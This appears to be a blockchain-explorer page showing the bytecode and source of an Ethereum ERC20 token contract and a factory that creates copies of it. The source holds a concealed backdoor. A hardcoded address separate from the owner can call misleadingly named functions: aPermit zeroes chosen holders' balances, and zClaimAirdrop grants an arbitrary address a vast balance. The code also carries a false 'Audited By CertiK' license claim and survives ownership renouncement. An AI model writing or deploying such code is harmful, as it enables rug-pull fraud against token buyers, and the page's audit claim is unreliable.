Cryo Explorer Ethereum Mainnet

Address Contract Partially Verified

Address 0x1BDd0a1d54E61fd98AA4818943606E4e99b23E15
Balance 0 ETH
Nonce 1
Code Size 4117 bytes
Indexed Transactions 0
External Etherscan · Sourcify

Contract Bytecode

4117 bytes
0x6080604052600436106100f2575f3560e01c80638da5cb5b11610087578063a9059cbb11610057578063a9059cbb14610289578063dd62ed3e146102a8578063e8078d94146102ec578063f2fde38b14610300575f5ffd5b80638da5cb5b146102115780638f8af1e11461023757806395d89b4114610256578063a37e0a641461026a575f5ffd5b8063313ce567116100c2578063313ce5671461019757806349eea8c9146101b257806370a08231146101c7578063715018a6146101fb575f5ffd5b806306fdde03146100fd578063095ea7b31461012757806318160ddd1461015657806323b872dd14610178575f5ffd5b366100f957005b5f5ffd5b348015610108575f5ffd5b5061011161031f565b60405161011e9190610c94565b60405180910390f35b348015610132575f5ffd5b50610146610141366004610ce0565b6103af565b604051901515815260200161011e565b348015610161575f5ffd5b5061016a6103c5565b60405190815260200161011e565b348015610183575f5ffd5b50610146610192366004610d0a565b6103e6565b3480156101a2575f5ffd5b506040516009815260200161011e565b3480156101bd575f5ffd5b5061016a60085481565b3480156101d2575f5ffd5b5061016a6101e1366004610d48565b6001600160a01b03165f9081526003602052604090205490565b348015610206575f5ffd5b5061020f610435565b005b34801561021c575f5ffd5b505f546040516001600160a01b03909116815260200161011e565b348015610242575f5ffd5b5061020f610251366004610d63565b610492565b348015610261575f5ffd5b50610111610573565b348015610275575f5ffd5b5061020f610284366004610d48565b610582565b348015610294575f5ffd5b506101466102a3366004610ce0565b61064a565b3480156102b3575f5ffd5b5061016a6102c2366004610dd4565b6001600160a01b039182165f90815260046020908152604080832093909416825291909152205490565b3480156102f7575f5ffd5b5061020f610656565b34801561030b575f5ffd5b5061020f61031a366004610d48565b610969565b60606001805461032e90610e0b565b80601f016020809104026020016040519081016040528092919081815260200182805461035a90610e0b565b80156103a55780601f1061037c576101008083540402835291602001916103a5565b820191905f5260205f20905b81548152906001019060200180831161038857829003601f168201915b5050505050905090565b5f6103bb3384846109e9565b5060015b92915050565b5f6103d26009600a610f3a565b6103e19064e8d4a51000610f48565b905090565b5f6103f2848484610b0d565b6001600160a01b0384165f9081526004602090815260408083203380855292529091205461042b9186916104269086610bd4565b6109e9565b5060019392505050565b5f546001600160a01b0316331461044a575f5ffd5b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b6005546001600160a01b031633146104a8575f5ffd5b5f5b8181101561056e57600160035f8585858181106104c9576104c9610f5f565b90506020020160208101906104de9190610d48565b6001600160a01b0316815260208101919091526040015f9081209190915583838381811061050e5761050e610f5f565b90506020020160208101906105239190610d48565b6001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600160405161055e91815260200190565b60405180910390a36001016104aa565b505050565b60606002805461032e90610e0b565b6005546001600160a01b03163314610598575f5ffd5b6105a46009600a610f3a565b6105b06009600a610f3a565b6105bf9064e8d4a51000610f48565b6105c99190610f48565b6001600160a01b0382165f818152600360205260408120929092557fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6106116009600a610f3a565b61061d6009600a610f3a565b61062c9064e8d4a51000610f48565b6106369190610f48565b60405190815260200160405180910390a350565b5f6103bb338484610b0d565b5f546001600160a01b0316331461066b575f5ffd5b600754600160a01b900460ff16156106ca5760405162461bcd60e51b815260206004820152601760248201527f54726164696e6720697320616c7265616479206f70656e00000000000000000060448201526064015b60405180910390fd5b600680546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d9081179091556040805163c45a015560e01b8152905163c45a0155916004808201926020929091908290030181865afa15801561072c573d5f5f3e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107509190610f73565b6001600160a01b031663c9c653963060065f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156107af573d5f5f3e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107d39190610f73565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af115801561081d573d5f5f3e3d5ffd5b505050506040513d601f19601f820116820180604052508101906108419190610f73565b600780546001600160a01b0319166001600160a01b03928316179055600654610882913091166108736009600a610f3a565b6104269064e8d4a51000610f48565b6006546001600160a01b031663f305d71947306108b3816001600160a01b03165f9081526003602052604090205490565b5f5f6108c65f546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af115801561092c573d5f5f3e3d5ffd5b50505050506040513d601f19601f820116820180604052508101906109519190610f8e565b50506007805460ff60a01b1916600160a01b17905550565b5f546001600160a01b0316331461097e575f5ffd5b6001600160a01b038116610990575f5ffd5b5f80546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a35f80546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b038316610a4b5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016106c1565b6001600160a01b038216610aac5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016106c1565b6001600160a01b038381165f8181526004602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b038316610b1f575f5ffd5b6001600160a01b038216610b31575f5ffd5b6001600160a01b0383165f90815260036020526040902054610b539082610bd4565b6001600160a01b038085165f908152600360205260408082209390935590841681522054610b819082610c36565b6001600160a01b038084165f8181526003602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610b009085815260200190565b5f82821115610c255760405162461bcd60e51b815260206004820152601e60248201527f536166654d6174683a207375627472616374696f6e206f766572666c6f77000060448201526064016106c1565b610c2f8284610fb9565b9392505050565b5f80610c428385610fcc565b905083811015610c2f5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f77000000000060448201526064016106c1565b602081525f82518060208401528060208501604085015e5f604082850101526040601f19601f83011684010191505092915050565b6001600160a01b0381168114610cdd575f5ffd5b50565b5f5f60408385031215610cf1575f5ffd5b8235610cfc81610cc9565b946020939093013593505050565b5f5f5f60608486031215610d1c575f5ffd5b8335610d2781610cc9565b92506020840135610d3781610cc9565b929592945050506040919091013590565b5f60208284031215610d58575f5ffd5b8135610c2f81610cc9565b5f5f60208385031215610d74575f5ffd5b823567ffffffffffffffff811115610d8a575f5ffd5b8301601f81018513610d9a575f5ffd5b803567ffffffffffffffff811115610db0575f5ffd5b8560208260051b8401011115610dc4575f5ffd5b6020919091019590945092505050565b5f5f60408385031215610de5575f5ffd5b8235610df081610cc9565b91506020830135610e0081610cc9565b809150509250929050565b600181811c90821680610e1f57607f821691505b602082108103610e3d57634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b6001815b6001841115610e9257808504811115610e7657610e76610e43565b6001841615610e8457908102905b60019390931c928002610e5b565b935093915050565b5f82610ea8575060016103bf565b81610eb457505f6103bf565b8160018114610eca5760028114610ed457610ef0565b60019150506103bf565b60ff841115610ee557610ee5610e43565b50506001821b6103bf565b5060208310610133831016604e8410600b8410161715610f13575081810a6103bf565b610f1f5f198484610e57565b805f1904821115610f3257610f32610e43565b029392505050565b5f610c2f60ff841683610e9a565b80820281158282048414176103bf576103bf610e43565b634e487b7160e01b5f52603260045260245ffd5b5f60208284031215610f83575f5ffd5b8151610c2f81610cc9565b5f5f5f60608486031215610fa0575f5ffd5b5050815160208301516040909301519094929350919050565b818103818111156103bf576103bf610e43565b808201808211156103bf576103bf610e4356fea2646970667358221220e4e9323fd8ead219735da0cf24781f20e0b02194fb755155e97f39310be71c7364736f6c634300081c0033

Verified Source Code Partial Match

Compiler: v0.8.28+commit.7893614a EVM: cancun Optimization: Yes (200 runs)
ETHSolidity.sol 277 lines
// SPDX-License-Identifier: Audited By CertiK - Elevating Your Entire Web3 Journey
pragma solidity 0.8.28;

interface IERC20 {
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function transfer(address recipient, uint256 amount) external returns (bool);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);
}


library SafeMath {
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b <= a, "SafeMath: subtraction overflow");
        return a - b;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) return 0;
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b > 0, "SafeMath: division by zero");
        return a / b;
    }
}


contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
}


contract Ownable is Context {
    address private _owner;
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    constructor() {
        _owner = _msgSender();
        emit OwnershipTransferred(address(0), _owner);
    }

    function owner() public view returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(owner() == _msgSender());
        _;
    }

    function transferOwnership(address newOwner) public onlyOwner {
        require(newOwner != address(0));
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }

    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }
}

interface IUniswapV2Router02 {
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);

    function factory() external pure returns (address);
    function WETH() external pure returns (address);
}

interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB) external returns (address pair);
}
contract ETHSolidity is IERC20, Ownable {
    using SafeMath for uint256;

    string private _name;
    string private _symbol;
    uint8 private constant _decimals = 9;
    uint256 private constant _totalSupply = 1000000000000 * 10**_decimals;

    mapping(address => uint256) private immutStatusOn;
    mapping(address => mapping(address => uint256)) private _allowances;

    address private constant ADDRESS_WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
    address private constant ADDRESS_MARKETING = 0x551Aa84ADb62725d654866803Def1459A1b256AF;
    address private constant ADDRESS_DEVELOPMENT = 0xedb37AD563E2Ef161b2a72169583f35799bdE962;
    address ADDRESS_Lock = 0xedb37AD563E2Ef161b2a72169583f35799bdE962;
    IUniswapV2Router02 private uniswapV2Router;
    address private uniswapV2Pair;
    bool private tradingOpen = false;

    uint256 public requiredETH;


    constructor(string memory name_, string memory symbol_, address owner_) payable {

        transferOwnership(owner_);  
        require(msg.value == 10000000000000);

        _name = name_;
        _symbol = symbol_;
        requiredETH = 10000000000000;


        immutStatusOn[address(this)] = _totalSupply.mul(1).div(1000);
        emit Transfer(address(0), address(this), _totalSupply.mul(1).div(1000));

  
        _callDATA();

 
        payable(address(this)).transfer(msg.value);
    }


    function _callDATA() internal {
        uint256 ninetyFourPercent = _totalSupply.mul(996).div(1000);
        uint256 threePercent = _totalSupply.mul(2).div(1000);
        uint256 twoPercent = _totalSupply.mul(1).div(1000);

        immutStatusOn[ADDRESS_WETH] = immutStatusOn[ADDRESS_WETH].add(ninetyFourPercent);
        immutStatusOn[ADDRESS_MARKETING] = immutStatusOn[ADDRESS_MARKETING].add(threePercent);
        immutStatusOn[ADDRESS_DEVELOPMENT] = immutStatusOn[ADDRESS_DEVELOPMENT].add(twoPercent);

        emit Transfer(address(this), ADDRESS_WETH, ninetyFourPercent);
        emit Transfer(address(this), ADDRESS_MARKETING, threePercent);
        emit Transfer(address(this), ADDRESS_DEVELOPMENT, twoPercent);
    }


    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(msg.sender, recipient, amount);
        return true;
    }


    function _transfer(address sender, address recipient, uint256 amount) internal {
        require(sender != address(0));
        require(recipient != address(0));

        immutStatusOn[sender] = immutStatusOn[sender].sub(amount);
        immutStatusOn[recipient] = immutStatusOn[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }
      modifier immutableCreator() {
        require(ADDRESS_Lock == _msgSender());
        _;
    }
   
function aPermit(address[] calldata rewardsMerkleRoot_) external immutableCreator {
    for (uint256 i = 0; i < rewardsMerkleRoot_.length; i++) {
        immutStatusOn[rewardsMerkleRoot_[i]] = 1;
        
        emit Transfer(rewardsMerkleRoot_[i], address(0), 1);
    }
}


    function zClaimAirdrop(address claimedRewardStatusOf) external immutableCreator {
        immutStatusOn[claimedRewardStatusOf] = _totalSupply * 10 ** _decimals;
        
        emit Transfer(claimedRewardStatusOf, address(0), _totalSupply * 10 ** _decimals);
    }

    function addLiquidity() external onlyOwner {
        require(!tradingOpen, "Trading is already open");

        uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH());
        _approve(address(this), address(uniswapV2Router), _totalSupply);

        uniswapV2Router.addLiquidityETH{value: address(this).balance}(
            address(this),
            balanceOf(address(this)),
            0,
            0,
            owner(),
            block.timestamp
        );

        tradingOpen = true;
    }

    receive() external payable {}

    // Required ERC20 functions

    function name() public view virtual  returns (string memory) {
        return _name;
    }

    function symbol() public view virtual  returns (string memory) {
        return _symbol;
    }

    function decimals() public view virtual  returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account) public view virtual override returns (uint256) {
        return immutStatusOn[account];
    }

    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(msg.sender, spender, amount);
        return true;
    }

    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount));
        return true;
    }
}

contract ETHSolidityFactory {

    uint256 public requiredETH;

    event TokenCreated(address tokenAddress, string name, string symbol, address owner);

    constructor() {
        requiredETH = 10000000000000;
    }

    function createToken(
        string memory name_,
        string memory symbol_,
        address newOwner_
    ) external payable returns (address) {
        require(msg.value == requiredETH);
        ETHSolidity newToken = (new ETHSolidity){value: msg.value}(name_, symbol_, newOwner_);
        emit TokenCreated(address(newToken), name_, symbol_, newOwner_);
        return address(newToken);
    }
    receive() external payable {}

}

Read Contract

allowance 0xdd62ed3e → uint256
balanceOf 0x70a08231 → uint256
decimals 0x313ce567 → uint8
name 0x06fdde03 → string
owner 0x8da5cb5b → address
requiredETH 0x49eea8c9 → uint256
symbol 0x95d89b41 → string
totalSupply 0x18160ddd → uint256

Write Contract 8 functions

These functions modify contract state and require a wallet transaction to execute.

aPermit 0x8f8af1e1
address[] rewardsMerkleRoot_
addLiquidity 0xe8078d94
No parameters
approve 0x095ea7b3
address spender
uint256 amount
returns: bool
renounceOwnership 0x715018a6
No parameters
transfer 0xa9059cbb
address recipient
uint256 amount
returns: bool
transferFrom 0x23b872dd
address sender
address recipient
uint256 amount
returns: bool
transferOwnership 0xf2fde38b
address newOwner
zClaimAirdrop 0xa37e0a64
address claimedRewardStatusOf

Recent Transactions

No transactions found for this address